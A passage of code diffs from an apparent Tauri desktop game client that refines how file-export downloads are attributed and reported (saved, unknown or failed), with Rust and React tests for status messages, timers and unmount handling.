         super::stash_download_destination(&mut outstanding, url.to_owned(), first.clone());
         super::stash_download_destination(&mut outstanding, other.to_owned(), second.clone());
         assert_eq!(
-            super::take_download_destination(&mut outstanding, other),
-            Some(second)
+            super::take_download_attribution(&mut outstanding, other),
+            Attributed(second)
         );
         assert_eq!(
-            super::take_download_destination(&mut outstanding, url),
-            Some(first)
+            super::take_download_attribution(&mut outstanding, url),
+            Attributed(first)
         );
         assert!(outstanding.is_empty());
 
-        // A completion with nothing outstanding has nothing to lend.
+        // A completion with nothing outstanding matches no request at all.
         assert_eq!(
-            super::take_download_destination(&mut outstanding, url),
-            None
+            super::take_download_attribution(&mut outstanding, url),
+            Unmatched
         );
+    }
+
+    /// Withholding a destination is a gap in the bookkeeping above, not a
+    /// verdict on the file: under wry's latched failure flag an ambiguous pair
+    /// may both have been written. Such a completion may therefore be reported
+    /// neither as a failed export nor with a destination it cannot claim.
+    #[cfg(desktop)]
+    #[test]
+    fn withheld_attribution_reports_neither_a_failure_nor_a_destination() {
+        use std::collections::HashMap;
+
+        use super::ShellDownloadOutcome::{Failed, Unknown};
+
+        let url = "blob:https://phase-rs.dev/export";
+        let written = std::env::temp_dir().join(format!(
+            "phase-rs-withheld-attribution-{}.tmp",
+            std::process::id()
+        ));
+        fs::write(&written, b"x").unwrap();
+        let missing = written.with_extension("absent");
+        let mut outstanding = HashMap::new();
+
+        // Two in flight for one url. The first destination is on disk, so a
+        // report of `Failed` here would be wrong about a file that exists, and
+        // a report of either destination would name a file this completion was
+        // never shown to be.
+        super::stash_download_destination(&mut outstanding, url.to_owned(), written.clone());
+        super::stash_download_destination(
+            &mut outstanding,
+            url.to_owned(),
+            written.with_extension("1.tmp"),
+        );
+        for _ in 0..2 {
+            let attribution = super::take_download_attribution(&mut outstanding, url);
+            assert_eq!(
+                super::finished_download_report(None, false, attribution),
+                (None, Unknown)
+            );
+        }
+
+        // One in flight and the file is there: the destination is reported.
+        super::stash_download_destination(&mut outstanding, url.to_owned(), written.clone());
+        let attribution = super::take_download_attribution(&mut outstanding, url);
+        assert_eq!(
+            super::finished_download_report(None, false, attribution),
+            (Some(written.clone()), Unknown)
+        );
+
+        // One in flight and nothing was written there: still a failure.
+        super::stash_download_destination(&mut outstanding, url.to_owned(), missing);
+        let attribution = super::take_download_attribution(&mut outstanding, url);
+        assert_eq!(
+            super::finished_download_report(None, false, attribution),
+            (None, Failed)
+        );
+
+        // The url is idle again, so this completion matches no request at all —
+        // the case withheld attribution must not be folded into.
+        assert!(outstanding.is_empty());
+        let attribution = super::take_download_attribution(&mut outstanding, url);
+        assert_eq!(
+            super::finished_download_report(None, false, attribution),
+            (None, Failed)
+        );
+
+        fs::remove_file(&written).unwrap();
     }
 
     /// The page is remotely served, so the destination it is handed must name

--- a/client/src-tauri/src/native_engine_contract.rs
+++ b/client/src-tauri/src/native_engine_contract.rs
@@ -27,6 +27,19 @@ pub struct NativeEngineReady {
     pub port: u16,
 }
 
+/// Where a browser-style download from the shell actually landed. The page only
+/// ever knows the file name it asked for, so the absolute path has to come from
+/// the shell side.
+// Unlike the wire-contract types below, mobile has no consumer for this at
+// all, so it is compiled out there rather than allow(dead_code)'d.
+#[cfg(desktop)]
+#[derive(Clone, Debug, Serialize)]
+pub struct ShellDownload {
+    pub url: String,
+    pub path: Option<String>,
+    pub success: bool,
+}
+
 #[derive(Clone, Debug, Serialize)]
 pub struct NativeEngineProgress {
     pub phase: NativeEngineProgressPhase,
@@ -204,6 +217,29 @@ mod tests {
                 format!(r#"{{"phase":"{expected}","detail":"12/34"}}"#)
             );
         }
+    }
+
+    #[cfg(desktop)]
+    #[test]
+    fn shell_download_preserves_every_exact_json_shape() {
+        assert_eq!(
+            serde_json::to_string(&ShellDownload {
+                url: "blob:http://127.0.0.1:8731/27fbd3e5".to_owned(),
+                path: Some("/home/u/Downloads/replay.json".to_owned()),
+                success: true,
+            })
+            .unwrap(),
+            r#"{"url":"blob:http://127.0.0.1:8731/27fbd3e5","path":"/home/u/Downloads/replay.json","success":true}"#
+        );
+        assert_eq!(
+            serde_json::to_string(&ShellDownload {
+                url: "blob:http://127.0.0.1:8731/27fbd3e5".to_owned(),
+                path: None,
+                success: false,
+            })
+            .unwrap(),
+            r#"{"url":"blob:http://127.0.0.1:8731/27fbd3e5","path":null,"success":false}"#
+        );
     }
 
     #[test]

--- a/client/src-tauri/src/native_engine_contract.rs
+++ b/client/src-tauri/src/native_engine_contract.rs
@@ -27,9 +27,23 @@ pub struct NativeEngineReady {
     pub port: u16,
 }
 
-/// Where a browser-style download from the shell actually landed. The page only
-/// ever knows the file name it asked for, so the absolute path has to come from
-/// the shell side.
+/// What became of a finished download. `Unknown` is an answer, not a hedge: a
+/// file sitting at the destination after wry reported failure is equally a
+/// stale failure flag and a write that died mid-file, and reporting either as
+/// saved would hand the user a corrupt snapshot.
+#[cfg(desktop)]
+#[derive(Clone, Copy, Debug, Eq, PartialEq, Serialize)]
+#[serde(rename_all = "snake_case")]
+pub enum ShellDownloadOutcome {
+    Saved,
+    Unknown,
+    Failed,
+}
+
+/// Where a browser-style download from the shell landed, and whether it did.
+/// The page only ever knows the file name it asked for, so the destination has
+/// to come from the shell side; it arrives home-relative because the page is
+/// remotely served content.
 // Unlike the wire-contract types below, mobile has no consumer for this at
 // all, so it is compiled out there rather than allow(dead_code)'d.
 #[cfg(desktop)]
@@ -37,7 +51,7 @@ pub struct NativeEngineReady {
 pub struct ShellDownload {
     pub url: String,
     pub path: Option<String>,
-    pub success: bool,
+    pub outcome: ShellDownloadOutcome,
 }
 
 #[derive(Clone, Debug, Serialize)]
@@ -225,20 +239,29 @@ mod tests {
         assert_eq!(
             serde_json::to_string(&ShellDownload {
                 url: "blob:http://127.0.0.1:8731/27fbd3e5".to_owned(),
-                path: Some("/home/u/Downloads/replay.json".to_owned()),
-                success: true,
+                path: Some("~/Downloads/replay.json".to_owned()),
+                outcome: ShellDownloadOutcome::Saved,
             })
             .unwrap(),
-            r#"{"url":"blob:http://127.0.0.1:8731/27fbd3e5","path":"/home/u/Downloads/replay.json","success":true}"#
+            r#"{"url":"blob:http://127.0.0.1:8731/27fbd3e5","path":"~/Downloads/replay.json","outcome":"saved"}"#
+        );
+        assert_eq!(
+            serde_json::to_string(&ShellDownload {
+                url: "blob:http://127.0.0.1:8731/27fbd3e5".to_owned(),
+                path: Some("~/Downloads/replay.json".to_owned()),
+                outcome: ShellDownloadOutcome::Unknown,
+            })
+            .unwrap(),
+            r#"{"url":"blob:http://127.0.0.1:8731/27fbd3e5","path":"~/Downloads/replay.json","outcome":"unknown"}"#
         );
         assert_eq!(
             serde_json::to_string(&ShellDownload {
                 url: "blob:http://127.0.0.1:8731/27fbd3e5".to_owned(),
                 path: None,
-                success: false,
+                outcome: ShellDownloadOutcome::Failed,
             })
             .unwrap(),
-            r#"{"url":"blob:http://127.0.0.1:8731/27fbd3e5","path":null,"success":false}"#
+            r#"{"url":"blob:http://127.0.0.1:8731/27fbd3e5","path":null,"outcome":"failed"}"#
         );
     }
 

--- a/client/src/components/chrome/DebugPanel.tsx
+++ b/client/src/components/chrome/DebugPanel.tsx
@@ -180,21 +180,21 @@ export function DebugPanel({
         // Under the desktop shell the message waits for the real destination;
         // a browser can only ever name the file it asked for.
         if (result.kind === "failed") {
-          return setStatus({ type: "error", message: "Failed to export game state" });
+          return setStatus({ type: "error", message: t("help.status.exportFailed") });
         }
         const message =
           result.kind === "requested"
-            ? `Export requested (${result.filename})`
+            ? t("help.status.exportRequested", { filename: result.filename })
             : result.path
-              ? `Exported to ${result.path}`
-              : `Exported ${result.filename}`;
+              ? t("help.status.exportedTo", { path: result.path })
+              : t("help.status.exported", { filename: result.filename });
         setStatus({ type: "success", message });
       })
       .catch((err: unknown) => {
         if (err instanceof DOMException && err.name === "AbortError") return;
-        setStatus({ type: "error", message: "Failed to export game state" });
+        setStatus({ type: "error", message: t("help.status.exportFailed") });
       });
-  }, [adapter]);
+  }, [adapter, t]);
 
   // Same destination as the top-left report flag. Close this panel first — it
   // renders at z-[9999], above the report dialog's z-50 overlay, so leaving it

--- a/client/src/components/chrome/DebugPanel.tsx
+++ b/client/src/components/chrome/DebugPanel.tsx
@@ -176,7 +176,20 @@ export function DebugPanel({
   const handleExportGameState = useCallback(() => {
     if (!adapter) return;
     exportAuthoritativeGameStateZip(adapter)
-      .then((filename) => setStatus({ type: "success", message: `Exported ${filename}` }))
+      .then((result) => {
+        // Under the desktop shell the message waits for the real destination;
+        // a browser can only ever name the file it asked for.
+        if (result.kind === "failed") {
+          return setStatus({ type: "error", message: "Failed to export game state" });
+        }
+        const message =
+          result.kind === "requested"
+            ? `Export requested (${result.filename})`
+            : result.path
+              ? `Exported to ${result.path}`
+              : `Exported ${result.filename}`;
+        setStatus({ type: "success", message });
+      })
       .catch((err: unknown) => {
         if (err instanceof DOMException && err.name === "AbortError") return;
         setStatus({ type: "error", message: "Failed to export game state" });

--- a/client/src/components/help/HelpSheet.tsx
+++ b/client/src/components/help/HelpSheet.tsx
@@ -242,7 +242,19 @@ export function HelpSheet() {
   const handleExportState = () => {
     if (!canExportAuthoritative || !adapter?.exportPersistenceState) return;
     exportAuthoritativeGameStateZip(adapter)
-      .then((filename) => setStatus(t("help.status.exported", { filename })))
+      .then((result) => {
+        // Only the desktop shell can say where the file actually landed, and
+        // only once it has landed; a browser knows nothing past the filename.
+        if (result.kind === "failed") return setStatus(t("help.status.exportFailed"));
+        if (result.kind === "requested") {
+          return setStatus(t("help.status.exportRequested", { filename: result.filename }));
+        }
+        setStatus(
+          result.path
+            ? t("help.status.exportedTo", { path: result.path })
+            : t("help.status.exported", { filename: result.filename }),
+        );
+      })
       .catch((err: unknown) => {
         if (err instanceof DOMException && err.name === "AbortError") return;
         setStatus(t("help.status.exportFailed"));
@@ -251,11 +263,18 @@ export function HelpSheet() {
 
   const handleExportReplay = () => {
     downloadCurrentReplay()
-      .then((filename) => {
+      .then((result) => {
+        if (!result) return setStatus(t("help.status.replayExportUnavailable"));
+        // Same ladder as the state export above: only the shell can say where
+        // the file landed, and a shell that said nothing has not saved it yet.
+        if (result.kind === "failed") return setStatus(t("help.status.replayExportFailed"));
+        if (result.kind === "requested") {
+          return setStatus(t("help.status.exportRequested", { filename: result.filename }));
+        }
         setStatus(
-          filename
-            ? t("help.status.replayExported", { filename })
-            : t("help.status.replayExportUnavailable"),
+          result.path
+            ? t("help.status.exportedTo", { path: result.path })
+            : t("help.status.replayExported", { filename: result.filename }),
         );
       })
       .catch((err: unknown) => {

--- a/client/src/components/help/__tests__/HelpSheet.test.tsx
+++ b/client/src/components/help/__tests__/HelpSheet.test.tsx
@@ -1,0 +1,76 @@
+import { afterEach, beforeEach, describe, expect, it, vi } from "vitest";
+import { act, cleanup, fireEvent, render, screen } from "@testing-library/react";
+
+import type { GameState } from "../../../adapter/types";
+import type { DownloadResult } from "../../../services/fileDownload";
+import { useGameStore } from "../../../stores/gameStore";
+import { useUiStore } from "../../../stores/uiStore";
+import { HelpSheet } from "../HelpSheet";
+
+const { downloadCurrentReplay } = vi.hoisted(() => ({ downloadCurrentReplay: vi.fn() }));
+vi.mock("../../../services/replayExport.ts", () => ({ downloadCurrentReplay }));
+
+describe("HelpSheet replay export status", () => {
+  beforeEach(() => {
+    downloadCurrentReplay.mockReset();
+    useUiStore.setState({ helpSheetOpen: true });
+    // The only thing the Export Replay button is gated on.
+    useGameStore.setState({ gameState: { turn_number: 1 } as GameState });
+  });
+
+  afterEach(() => {
+    cleanup();
+    useUiStore.setState({ helpSheetOpen: false });
+    useGameStore.setState({ gameState: null });
+  });
+
+  async function clickExportReplay() {
+    render(<HelpSheet />);
+    fireEvent.click(screen.getByText("Export Replay"));
+    return screen.findByText(/./, { selector: "p.text-emerald-300" });
+  }
+
+  it.each<[string, DownloadResult | null, string]>([
+    [
+      "a shell save reports the absolute path it landed on",
+      { kind: "saved", filename: "replay.json", path: "/home/u/Downloads/replay.json" },
+      "Exported to /home/u/Downloads/replay.json.",
+    ],
+    [
+      "a browser save reports the filename it asked for",
+      { kind: "saved", filename: "replay.json" },
+      "Replay saved as replay.json.",
+    ],
+    [
+      "a shell that never reported claims only that the export was requested",
+      { kind: "requested", filename: "replay.json" },
+      "Export requested — replay.json.",
+    ],
+    [
+      "a failed download is not reported as a save",
+      { kind: "failed", filename: "replay.json", path: "/home/u/Downloads/replay.json" },
+      "Could not export the replay.",
+    ],
+    ["no recording says so", null, "No replay recording is available for this game."],
+  ])("%s", async (_name, result, expected) => {
+    downloadCurrentReplay.mockResolvedValue(result);
+
+    expect(await clickExportReplay()).toHaveTextContent(expected);
+  });
+
+  it("stays silent when the user cancels the save picker", async () => {
+    downloadCurrentReplay.mockRejectedValue(new DOMException("cancelled", "AbortError"));
+    render(<HelpSheet />);
+
+    fireEvent.click(screen.getByText("Export Replay"));
+    // The rejection settles two microtasks out and React commits on a later
+    // task; without this flush the assertion below passes with the AbortError
+    // guard deleted.
+    await act(async () => {
+      await new Promise((resolve) => setTimeout(resolve, 0));
+    });
+
+    expect(downloadCurrentReplay).toHaveBeenCalledOnce();
+    expect(document.querySelector("p.text-emerald-300")).toBeNull();
+  });
+});

--- a/client/src/components/modal/EngineLostModal.tsx
+++ b/client/src/components/modal/EngineLostModal.tsx
@@ -4,6 +4,7 @@ import { Trans, useTranslation } from "react-i18next";
 import { useNavigate } from "react-router";
 
 import { onEngineLost, onEngineSlow } from "../../game/engineRecovery";
+import type { DownloadResult } from "../../services/fileDownload";
 import { exportGameStateDebugZip } from "../../services/gameStateExport";
 import { useGameStore } from "../../stores/gameStore";
 import type { GameState } from "../../adapter/types";
@@ -52,8 +53,7 @@ export function EngineLostModal() {
   const [snapshot, setSnapshot] = useState<EngineLostSnapshot | null>(null);
   const [showDetails, setShowDetails] = useState(false);
   const [copied, setCopied] = useState(false);
-  const [exported, setExported] = useState(false);
-  const [exportFailed, setExportFailed] = useState(false);
+  const [exportOutcome, setExportOutcome] = useState<DownloadResult["kind"] | null>(null);
   // One export at a time: an earlier click's 2s clear timer wipes a later export's result.
   const [isExporting, setIsExporting] = useState(false);
 
@@ -127,21 +127,20 @@ export function EngineLostModal() {
 
   const handleExport = async () => {
     if (!snapshot.gameState) return;
+    // "requested" keeps its own label: this is the recovery path, so a snapshot
+    // nothing has confirmed must not read as one the player can go find.
+    const show = (kind: DownloadResult["kind"]) => {
+      setExportOutcome(kind);
+      window.setTimeout(() => setExportOutcome(null), 2000);
+    };
     setIsExporting(true);
-    setExported(false);
-    setExportFailed(false);
+    setExportOutcome(null);
     try {
       const result = await exportGameStateDebugZip(snapshot.gameState);
-      // This button has two states, so "requested" -- the shell not reporting
-      // inside the wait, with the download still running -- reads as exported;
-      // only an outright failure must not.
-      const flag = result.kind === "failed" ? setExportFailed : setExported;
-      flag(true);
-      window.setTimeout(() => flag(false), 2000);
+      show(result.kind);
     } catch (err) {
       if (err instanceof DOMException && err.name === "AbortError") return;
-      setExportFailed(true);
-      window.setTimeout(() => setExportFailed(false), 2000);
+      show("failed");
     } finally {
       setIsExporting(false);
     }
@@ -211,11 +210,13 @@ export function EngineLostModal() {
             disabled={isExporting || !snapshot.gameState}
             className="rounded-lg bg-gray-700 px-4 py-2 text-sm font-semibold text-white transition-colors hover:bg-gray-600 disabled:cursor-not-allowed disabled:opacity-50"
           >
-            {exportFailed
+            {exportOutcome === "failed"
               ? t("engineLost.exportFailed")
-              : exported
-                ? t("engineLost.exported")
-                : t("engineLost.exportClientSnapshot")}
+              : exportOutcome === "requested"
+                ? t("engineLost.exportRequested")
+                : exportOutcome === "saved"
+                  ? t("engineLost.exported")
+                  : t("engineLost.exportClientSnapshot")}
           </button>
           {isPanic && (
             <>

--- a/client/src/components/modal/EngineLostModal.tsx
+++ b/client/src/components/modal/EngineLostModal.tsx
@@ -128,9 +128,13 @@ export function EngineLostModal() {
     setExported(false);
     setExportFailed(false);
     try {
-      await exportGameStateDebugZip(snapshot.gameState);
-      setExported(true);
-      window.setTimeout(() => setExported(false), 2000);
+      const result = await exportGameStateDebugZip(snapshot.gameState);
+      // This button has two states, so "requested" -- the shell not reporting
+      // inside the wait, with the download still running -- reads as exported;
+      // only an outright failure must not.
+      const flag = result.kind === "failed" ? setExportFailed : setExported;
+      flag(true);
+      window.setTimeout(() => flag(false), 2000);
     } catch (err) {
       if (err instanceof DOMException && err.name === "AbortError") return;
       setExportFailed(true);

--- a/client/src/components/modal/EngineLostModal.tsx
+++ b/client/src/components/modal/EngineLostModal.tsx
@@ -54,6 +54,8 @@ export function EngineLostModal() {
   const [copied, setCopied] = useState(false);
   const [exported, setExported] = useState(false);
   const [exportFailed, setExportFailed] = useState(false);
+  // One export at a time: an earlier click's 2s clear timer wipes a later export's result.
+  const [isExporting, setIsExporting] = useState(false);
 
   useEffect(() => {
     // External latch instead of a setState updater with a side effect.
@@ -125,6 +127,7 @@ export function EngineLostModal() {
 
   const handleExport = async () => {
     if (!snapshot.gameState) return;
+    setIsExporting(true);
     setExported(false);
     setExportFailed(false);
     try {
@@ -139,6 +142,8 @@ export function EngineLostModal() {
       if (err instanceof DOMException && err.name === "AbortError") return;
       setExportFailed(true);
       window.setTimeout(() => setExportFailed(false), 2000);
+    } finally {
+      setIsExporting(false);
     }
   };
 
@@ -203,7 +208,7 @@ export function EngineLostModal() {
           <button
             type="button"
             onClick={handleExport}
-            disabled={!snapshot.gameState}
+            disabled={isExporting || !snapshot.gameState}
             className="rounded-lg bg-gray-700 px-4 py-2 text-sm font-semibold text-white transition-colors hover:bg-gray-600 disabled:cursor-not-allowed disabled:opacity-50"
           >
             {exportFailed

--- a/client/src/components/modal/EngineLostModal.tsx
+++ b/client/src/components/modal/EngineLostModal.tsx
@@ -60,6 +60,8 @@ export function EngineLostModal() {
   // timer has to be cancelled rather than left to wipe the newer result.
   const copyResetRef = useRef<number | null>(null);
   const exportResetRef = useRef<number | null>(null);
+  // Invariant: nothing after an await touches state once unmounted.
+  const mountedRef = useRef(false);
 
   useEffect(() => {
     // External latch instead of a setState updater with a side effect.
@@ -96,13 +98,14 @@ export function EngineLostModal() {
     };
   }, []);
 
-  useEffect(
-    () => () => {
+  useEffect(() => {
+    mountedRef.current = true;
+    return () => {
+      mountedRef.current = false;
       if (copyResetRef.current !== null) window.clearTimeout(copyResetRef.current);
       if (exportResetRef.current !== null) window.clearTimeout(exportResetRef.current);
-    },
-    [],
-  );
+    };
+  }, []);
 
   if (!snapshot) return null;
 
@@ -133,6 +136,7 @@ export function EngineLostModal() {
       window.prompt(t("engineLost.copyPrompt"), diagnostic);
       return;
     }
+    if (!mountedRef.current) return;
     setCopied(true);
     if (copyResetRef.current !== null) window.clearTimeout(copyResetRef.current);
     copyResetRef.current = window.setTimeout(() => setCopied(false), 2000);
@@ -143,6 +147,9 @@ export function EngineLostModal() {
     // "requested" keeps its own label: this is the recovery path, so a snapshot
     // nothing has confirmed must not read as one the player can go find.
     const show = (kind: DownloadResult["kind"]) => {
+      // The reachable case: under the shell the export waits up to ten seconds,
+      // so this can arm a timer past the cleanup that would have cleared it.
+      if (!mountedRef.current) return;
       setExportOutcome(kind);
       if (exportResetRef.current !== null) window.clearTimeout(exportResetRef.current);
       exportResetRef.current = window.setTimeout(() => setExportOutcome(null), 2000);
@@ -156,7 +163,7 @@ export function EngineLostModal() {
       if (err instanceof DOMException && err.name === "AbortError") return;
       show("failed");
     } finally {
-      setIsExporting(false);
+      if (mountedRef.current) setIsExporting(false);
     }
   };
 

--- a/client/src/components/modal/EngineLostModal.tsx
+++ b/client/src/components/modal/EngineLostModal.tsx
@@ -1,4 +1,4 @@
-import { useEffect, useState } from "react";
+import { useEffect, useRef, useState } from "react";
 import type { TFunction } from "i18next";
 import { Trans, useTranslation } from "react-i18next";
 import { useNavigate } from "react-router";
@@ -54,8 +54,12 @@ export function EngineLostModal() {
   const [showDetails, setShowDetails] = useState(false);
   const [copied, setCopied] = useState(false);
   const [exportOutcome, setExportOutcome] = useState<DownloadResult["kind"] | null>(null);
-  // One export at a time: an earlier click's 2s clear timer wipes a later export's result.
+  // One export at a time: two in flight would resolve in either order.
   const [isExporting, setIsExporting] = useState(false);
+  // A later click lands inside the previous one's clear window, so each label
+  // timer has to be cancelled rather than left to wipe the newer result.
+  const copyResetRef = useRef<number | null>(null);
+  const exportResetRef = useRef<number | null>(null);
 
   useEffect(() => {
     // External latch instead of a setState updater with a side effect.
@@ -92,6 +96,14 @@ export function EngineLostModal() {
     };
   }, []);
 
+  useEffect(
+    () => () => {
+      if (copyResetRef.current !== null) window.clearTimeout(copyResetRef.current);
+      if (exportResetRef.current !== null) window.clearTimeout(exportResetRef.current);
+    },
+    [],
+  );
+
   if (!snapshot) return null;
 
   const { reason, panic } = snapshot;
@@ -122,7 +134,8 @@ export function EngineLostModal() {
       return;
     }
     setCopied(true);
-    window.setTimeout(() => setCopied(false), 2000);
+    if (copyResetRef.current !== null) window.clearTimeout(copyResetRef.current);
+    copyResetRef.current = window.setTimeout(() => setCopied(false), 2000);
   };
 
   const handleExport = async () => {
@@ -131,7 +144,8 @@ export function EngineLostModal() {
     // nothing has confirmed must not read as one the player can go find.
     const show = (kind: DownloadResult["kind"]) => {
       setExportOutcome(kind);
-      window.setTimeout(() => setExportOutcome(null), 2000);
+      if (exportResetRef.current !== null) window.clearTimeout(exportResetRef.current);
+      exportResetRef.current = window.setTimeout(() => setExportOutcome(null), 2000);
     };
     setIsExporting(true);
     setExportOutcome(null);

--- a/client/src/components/modal/__tests__/EngineLostModal.test.tsx
+++ b/client/src/components/modal/__tests__/EngineLostModal.test.tsx
@@ -95,12 +95,18 @@ describe("EngineLostModal", () => {
       "Exported",
     ],
     [
-      // The button has two states, so a download still running under the shell
-      // reads as exported; only an outright failure must not.
-      "a shell that never reported still reads as exported",
+      // This is the recovery path: a snapshot nothing confirmed must not send
+      // the player looking for a file that may not exist.
+      "a shell that never confirmed the export does not read as exported",
       { kind: "requested", filename: "game-state.zip" },
+      "Export unconfirmed",
       "Exported",
-      "Export failed",
+    ],
+    [
+      "a confirmed download reads as exported",
+      { kind: "saved", filename: "game-state.zip", path: "~/Downloads/game-state.zip" },
+      "Exported",
+      "Export unconfirmed",
     ],
   ])("%s", async (_name, result, shown, hidden) => {
     exportGameStateDebugZip.mockResolvedValue(result);
@@ -137,6 +143,6 @@ describe("EngineLostModal", () => {
     expect(exportGameStateDebugZip).toHaveBeenCalledTimes(1);
 
     settle({ kind: "requested", filename: "game-state.zip" });
-    expect(await screen.findByRole("button", { name: "Exported" })).toBeEnabled();
+    expect(await screen.findByRole("button", { name: "Export unconfirmed" })).toBeEnabled();
   });
 });

--- a/client/src/components/modal/__tests__/EngineLostModal.test.tsx
+++ b/client/src/components/modal/__tests__/EngineLostModal.test.tsx
@@ -223,4 +223,34 @@ describe("EngineLostModal", () => {
     act(() => vi.advanceTimersByTime(1_500));
     expect(screen.getByRole("button", { name: "Copy diagnostic" })).toBeInTheDocument();
   });
+
+  // The export outlives the modal easily — under the shell it waits up to ten
+  // seconds — and the unmount cleanup has already run by the time it settles,
+  // so a reset timer armed after it has nothing left to clear it.
+  it("arms no reset timer when the modal unmounts mid-export", async () => {
+    vi.useFakeTimers();
+    let settle!: (result: DownloadResult) => void;
+    const pending = new Promise<DownloadResult>((resolve) => {
+      settle = resolve;
+    });
+    exportGameStateDebugZip.mockReturnValueOnce(pending);
+    setGameStoreForTest({ gameId: GAME_ID, gameMode: "ai" });
+    renderModal();
+
+    act(() => notifyEngineLost("submitAction"));
+    const exportButton = screen.getByRole("button", { name: "Export client snapshot" });
+    fireEvent.click(exportButton);
+    // Gate on the committed disabled state: the export is only actually in
+    // flight once React has rendered the click's state update.
+    await act(async () => {});
+    expect(exportButton).toBeDisabled();
+
+    cleanup();
+    settle({ kind: "saved", filename: "game-state.zip", path: "~/Downloads/game-state.zip" });
+    await act(async () => {
+      await pending;
+    });
+
+    expect(vi.getTimerCount()).toBe(0);
+  });
 });

--- a/client/src/components/modal/__tests__/EngineLostModal.test.tsx
+++ b/client/src/components/modal/__tests__/EngineLostModal.test.tsx
@@ -1,10 +1,11 @@
 import "fake-indexeddb/auto";
 
 import { act, cleanup, fireEvent, render, screen } from "@testing-library/react";
-import { afterEach, describe, expect, it } from "vitest";
+import { afterEach, describe, expect, it, vi } from "vitest";
 import { MemoryRouter, Route, Routes } from "react-router";
 
 import { notifyEngineLost, notifyEngineSlow } from "../../../game/engineRecovery";
+import type { DownloadResult } from "../../../services/fileDownload";
 import {
   clearGame,
   loadActiveGame,
@@ -15,6 +16,9 @@ import {
 } from "../../../stores/gameStore";
 import { setGameStoreForTest } from "../../../test/helpers/gameStoreHelpers";
 import { EngineLostModal } from "../EngineLostModal";
+
+const { exportGameStateDebugZip } = vi.hoisted(() => ({ exportGameStateDebugZip: vi.fn() }));
+vi.mock("../../../services/gameStateExport", () => ({ exportGameStateDebugZip }));
 
 const GAME_ID = "resumable-engine-loss";
 const activeGame = {
@@ -81,5 +85,34 @@ describe("EngineLostModal", () => {
       screen.getByRole("button", { name: "Continue waiting" }),
     ).toBeInTheDocument();
     expect(screen.queryByRole("button", { name: "Main Menu" })).not.toBeInTheDocument();
+  });
+
+  it.each<[string, DownloadResult, string, string]>([
+    [
+      "a failed download is not reported as an export",
+      { kind: "failed", filename: "game-state.zip" },
+      "Export failed",
+      "Exported",
+    ],
+    [
+      // The button has two states, so a download still running under the shell
+      // reads as exported; only an outright failure must not.
+      "a shell that never reported still reads as exported",
+      { kind: "requested", filename: "game-state.zip" },
+      "Exported",
+      "Export failed",
+    ],
+  ])("%s", async (_name, result, shown, hidden) => {
+    exportGameStateDebugZip.mockResolvedValue(result);
+    setGameStoreForTest({ gameId: GAME_ID, gameMode: "ai" });
+    renderModal();
+
+    act(() => notifyEngineLost("submitAction"));
+    fireEvent.click(screen.getByRole("button", { name: "Export client snapshot" }));
+
+    // Gate on the commit, not on the mock: awaiting the call alone would read a
+    // DOM the promise continuation has not updated yet, and pass either way.
+    expect(await screen.findByRole("button", { name: shown })).toBeInTheDocument();
+    expect(screen.queryByRole("button", { name: hidden })).not.toBeInTheDocument();
   });
 });

--- a/client/src/components/modal/__tests__/EngineLostModal.test.tsx
+++ b/client/src/components/modal/__tests__/EngineLostModal.test.tsx
@@ -1,6 +1,6 @@
 import "fake-indexeddb/auto";
 
-import { act, cleanup, fireEvent, render, screen } from "@testing-library/react";
+import { act, cleanup, fireEvent, render, screen, waitFor } from "@testing-library/react";
 import { afterEach, describe, expect, it, vi } from "vitest";
 import { MemoryRouter, Route, Routes } from "react-router";
 
@@ -114,5 +114,29 @@ describe("EngineLostModal", () => {
     // DOM the promise continuation has not updated yet, and pass either way.
     expect(await screen.findByRole("button", { name: shown })).toBeInTheDocument();
     expect(screen.queryByRole("button", { name: hidden })).not.toBeInTheDocument();
+  });
+
+  it("refuses a second export while the first is still in flight", async () => {
+    let settle!: (result: DownloadResult) => void;
+    exportGameStateDebugZip.mockReturnValue(
+      new Promise<DownloadResult>((resolve) => {
+        settle = resolve;
+      }),
+    );
+    exportGameStateDebugZip.mockClear();
+    setGameStoreForTest({ gameId: GAME_ID, gameMode: "ai" });
+    renderModal();
+
+    act(() => notifyEngineLost("submitAction"));
+    const exportButton = screen.getByRole("button", { name: "Export client snapshot" });
+    fireEvent.click(exportButton);
+
+    // Gate on the committed disabled state, not on the mock having been called.
+    await waitFor(() => expect(exportButton).toBeDisabled());
+    fireEvent.click(exportButton);
+    expect(exportGameStateDebugZip).toHaveBeenCalledTimes(1);
+
+    settle({ kind: "requested", filename: "game-state.zip" });
+    expect(await screen.findByRole("button", { name: "Exported" })).toBeEnabled();
   });
 });

--- a/client/src/components/modal/__tests__/EngineLostModal.test.tsx
+++ b/client/src/components/modal/__tests__/EngineLostModal.test.tsx
@@ -20,6 +20,9 @@ import { EngineLostModal } from "../EngineLostModal";
 const { exportGameStateDebugZip } = vi.hoisted(() => ({ exportGameStateDebugZip: vi.fn() }));
 vi.mock("../../../services/gameStateExport", () => ({ exportGameStateDebugZip }));
 
+const { copyText } = vi.hoisted(() => ({ copyText: vi.fn() }));
+vi.mock("../../../services/copyText", () => ({ copyText }));
+
 const GAME_ID = "resumable-engine-loss";
 const activeGame = {
   id: GAME_ID,
@@ -40,6 +43,7 @@ function renderModal() {
 }
 
 afterEach(async () => {
+  vi.useRealTimers();
   cleanup();
   useGameStore.setState({ gameId: null, gameMode: null, gameState: null });
   await clearGame(GAME_ID);
@@ -144,5 +148,79 @@ describe("EngineLostModal", () => {
 
     settle({ kind: "requested", filename: "game-state.zip" });
     expect(await screen.findByRole("button", { name: "Export unconfirmed" })).toBeEnabled();
+  });
+
+  // Fake timers only here: the point is what happens when the earlier export's
+  // reset comes due, which real timers would buy at two seconds of wall clock.
+  it("keeps a later export's result when the earlier export's reset comes due", async () => {
+    vi.useFakeTimers();
+    setGameStoreForTest({ gameId: GAME_ID, gameMode: "ai" });
+    renderModal();
+
+    act(() => notifyEngineLost("submitAction"));
+    const exportButton = screen.getByRole("button", { name: "Export client snapshot" });
+    const exportOnce = async (result: DownloadResult) => {
+      const settled = Promise.resolve(result);
+      exportGameStateDebugZip.mockReturnValueOnce(settled);
+      fireEvent.click(exportButton);
+      // Gate on the commit, not on the mock: the result lands in a promise
+      // continuation React has not rendered yet.
+      await act(async () => {
+        await settled;
+      });
+    };
+
+    await exportOnce({
+      kind: "saved",
+      filename: "game-state.zip",
+      path: "~/Downloads/game-state.zip",
+    });
+    expect(screen.getByRole("button", { name: "Exported" })).toBeInTheDocument();
+
+    act(() => vi.advanceTimersByTime(1_500));
+    await exportOnce({ kind: "failed", filename: "game-state.zip" });
